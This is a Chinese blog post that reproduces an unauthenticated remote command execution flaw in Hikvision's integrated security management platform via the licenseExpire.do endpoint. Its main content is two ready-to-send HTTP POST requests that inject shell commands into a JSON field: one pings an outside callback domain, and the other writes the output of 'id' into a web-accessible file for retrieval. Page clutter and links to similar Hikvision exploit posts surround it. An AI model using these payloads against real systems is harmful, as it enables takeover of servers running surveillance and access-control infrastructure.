[漏洞复现]海康威视综合安防管理平台存在licenseExpire前台RCE

已于 2024-08-02 17:27:43 修改
阅读量302 收藏
点赞数 3
文章标签: web安全 安全 海康
于 2024-08-02 17:27:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LiangYueSec/article/details/140876237
版权

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。

免责声明

本号所发布的所有内容,包括但不限于信息、工具、项目以及文章,均旨在提供学习与研究之用。所有工具安全性自测。如因此产生的一切不良后果与文章作者和本公众号无关。如有涉及公司与个人敏感信息,侵权烦请告知,我们会立即删除并致歉。

漏洞简介

海康威视综合安防管理平台涵盖了视频监控、报警系统、门禁系统等众多功能,实现了全方位的安防管理。攻击者可通过前台RCE获取服务器权限。

漏洞POC

跟detection命令执行利用差不多

POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{"type":"environment","operate":"","machines":{"id":"$(ping+qsdiehtuxn.dgrh3.cn)"}

执行回显

POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
Host: 
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu=
Connection: close
Content-Length: 135

{"type":"environment","operate":"","machines":{"id":"$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}

访问/vms/static/1.txt查看

LiangYueSec
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
海康威视综合安防管理平台 detection 前台RCE漏洞复现
0xSec
07-22 4424
海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
海康威视 isecure center 综合安防管理平台任意文件上传漏洞
做自己喜欢的事,并将其发挥到极致!
06-19 878
海康威视部分综合安防管理平台管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。海康威视综合安防管理平台keepAlive接口存在Fastjson远程命令执行漏洞,攻击者可通过构造恶意Payload执行并获取服务器系统权限以及敏感数据信息。
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
fly夏天的博客
06-19 1274
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
对接海康综合安防管理平台经验总结
热门推荐
一颗橘子的博客
12-14 3万+
前言:因业务需要对接海康威视综合安防管理平台获得下属所管理的摄像头,根据摄像头code获得监控视频流信息 1、详情可以浏览海康开放平台,在官网上有对应的接入指南以及开放的API接口【前提是本地已部署了海康视频流媒体服务器】 2、通过海康开放平台我们看到相关的对接指南,进行开发前准备。如下图所示: 3、AK/SK可以要求甲方提供,如果是驻场开发可以在当前的局域网下通过运管中心的登录名/密码登陆该平台,通过下面的索引步骤来获得 AK/SK。 4、获得到 AK/SK后,通过参考开放的API文档,找到项目
HW漏洞威胁情报第七天|HW情报
最新发布
weixin_43167326的博客
07-31 915
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
漏洞复现海康威视综合安防管理平台Fastjson远程命令执行漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-28 8645
综合安防管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。
海康安防综合管理平台操作指南(CS).docx
09-15
海康安防综合管理平台操作指南(CS)
海康威视综合安防管理平台部署手册
09-13
海康威视作为全球领先的安防解决方案提供商,其综合安防管理平台是企业级客户进行安全监控、报警管理、视频存储及分析的重要工具。本部署手册旨在为用户详细阐述如何有效地安装、配置以及管理这一系统,确保用户能够...
海康威视iSecure Center综合管理平台产品手册
01-12
海康威视iSecure Center综合管理平台是一款专为安防领域设计的高度集成化和智能化的管理工具,旨在满足全行业的综合安防需求。该平台基于“统一软件技术架构”理念,运用业务组件化技术,确保了平台在业务扩展上的...
iSecure Center综合安防管理平台配置手册 V2.0.0
01-04
海康威视iSecure Center综合安防管理平台配置手册 V2.0.0】是针对该公司的安防管理系统的一份详细指南。iSecure Center是一个一体化、智能化的解决方案,它旨在通过集成视频监控、停车场管理、门禁控制以及报警...
HIKVISION iSecure Center 综合安防管理平台 操作指南 V1.1.0.chm
09-04
HIKVISION iSecure Center 综合安防管理平台 操作指南 V1.1.0
安防综合管理平台介绍
04-25
安防综合管理平台PSIM 是业界最为专业的管理系统,适应了现代各类监控系统的复杂集成需要。
海康威视综合安防平台1.3.0
04-24
海康威视综合安防平台1.3.0(iSecureCenter)是一款面向企业级用户的高级安全管理系统,旨在为企业提供全方位的安全管理和监控服务。本版本针对用户的需求进行了优化升级,不仅增强了系统的稳定性和安全性,还提供了...
综合安防管理平台 安装部署手册
08-18
综合安防管理平台安装部署手册知识点总结 本手册提供了综合安防管理平台的安装部署指南,旨在引导用户快速完成安装和部署过程。以下是从手册中提炼的关键知识点: 通用约定 1. 图形界面元素引用约定:在手册中,...
第三方研发如何对接海康综合安防管理平台进行二次开发?
qq_1059136269
01-23 1万+
目前海康有:海康威视智能应用平台(Infovision IoT)和综合安防管理平台(iSecure Center)两套不同构架的平台。而本文适合第三方研发对接海康综合安防管理平台(iSecure Center)进行开发的相关说明,更多开发文档请移驾海康开放平台查阅:Hikvision AI Cloud 开放平台。 下面就快速对接综合安防管理平台(iSecure Center)开发进行一些简要说明,更详细的文档说明请移步官网查阅。 一、环境准备 对接前需要先部署海康威视综合安防管理平台 iSecure
海康威视iVMS-8700综合安防管理平台 文件读取漏洞复现
0xSec
12-13 2131
HIKVISION iVMS 综合安防管理平台download接口处存在任意文件读取漏洞,攻击者通过构造token绕过身份认证,读取服务器中的目录信息与敏感文件。使系统处于极不安全的状态。
海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
05-31 3715
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值